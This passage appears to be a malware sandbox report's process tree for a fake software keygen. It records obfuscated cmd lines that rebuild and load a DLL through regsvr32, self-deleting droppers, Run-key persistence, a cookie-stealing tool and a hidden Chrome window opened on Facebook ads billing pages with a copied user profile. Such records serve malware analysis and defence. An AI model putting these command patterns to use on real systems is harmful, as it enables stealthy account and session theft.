                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:1532
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4180 /prefetch:8
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:4944
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\wanggz.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\wanggz.exe"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:5572
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                    PID:5596
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:2676
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:996
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:5256
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:1496
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.zip\Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.zip\Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:500
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
                                                                                                                                                                                                                      keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:2256
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:5260
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:4576
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
                                                                                                                                                                                                                        keygen-step-1.exe
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe
                                                                                                                                                                                                                        keygen-step-5.exe
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /q/c copY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe" ikWAmmoO.exe > NuL && sTaRT ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk & IF "" =="" for %C IN ("C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe" ) do taskkill /IM "%~NXC" /f> Nul
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1540
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe
                                                                                                                                                                                                                              ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:3908
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /q/c copY /y "C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe" ikWAmmoO.exe > NuL && sTaRT ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk & IF "/PBFgM5YfESkcrdT0TH7go8wAsk " =="" for %C IN ("C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe" ) do taskkill /IM "%~NXC" /f> Nul
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:4100
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C echO | SeT /p = "MZ" > CCCW_Us.YOE &cOPy /B /Y CCCW_us.YOE + TkCqJV.CvJ +b7K~_K._ + 6~1V061.BQT + OXLB~.aZ SQHJc.II > nuL& Del TkCQJV.CVJ B7K~_K._ 6~1V061.BqT OXLB~.az CCCW_US.YOE > nUL& stArt regsvr32.exe /U /S .\SqHJC.Ii
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:3600
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>CCCW_Us.YOE"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echO "
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                          regsvr32.exe /U /S .\SqHJC.Ii
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                                          PID:2492
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /IM "keygen-step-5.exe" /f
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:2660
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
                                                                                                                                                                                                                                  keygen-step-2.exe
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5636
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\DD74.tmp.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\DD74.tmp.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:4016
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DD74.tmp.exe"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:428
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:1996
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:3556
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                          PID:1220
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
                                                                                                                                                                                                                                      keygen-step-3.exe
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:408
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
                                                                                                                                                                                                                                        keygen-step-4.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:3672
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg6_6asg.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg6_6asg.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                          PID:4360
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5272
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:5564
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                              xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                              PID:2196
                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ff9e84d4f50,0x7ff9e84d4f60,0x7ff9e84d4f70
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:1532
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1484 /prefetch:2
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5220
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1940 /prefetch:8
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                    PID:5308
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2096 /prefetch:8
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:5264
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4676
                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:5324
                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:2636
                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:4196
                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:4276
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5688 /prefetch:8
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\90.260.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=nDIjb94VsCYCVz6P/w3WpTffLA0yQ/dvukfaUnQQ --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                    c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=90.260.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff62f35a808,0x7ff62f35a818,0x7ff62f35a828
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:2692
                                                                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                    "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4132_YLSYXQYYJSMLKNTL" --sandboxed-process-id=2 --init-done-notifier=700 --sandbox-mojo-pipe-token=482212063668793371 --mojo-platform-channel-handle=684 --engine=2
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                    "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4132_YLSYXQYYJSMLKNTL" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=5547459484720706749 --mojo-platform-channel-handle=912
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:692
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5572 /prefetch:8
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:3256
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3604 /prefetch:8
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,9678908988549171604,3842133379863283023,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5880 /prefetch:2
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:2660
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\wanggz.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\wanggz.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:5920
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                PID:4180
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:1584
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:2296
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                PID:408
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:3668

                                                                                                                                                                                                                                                      Network

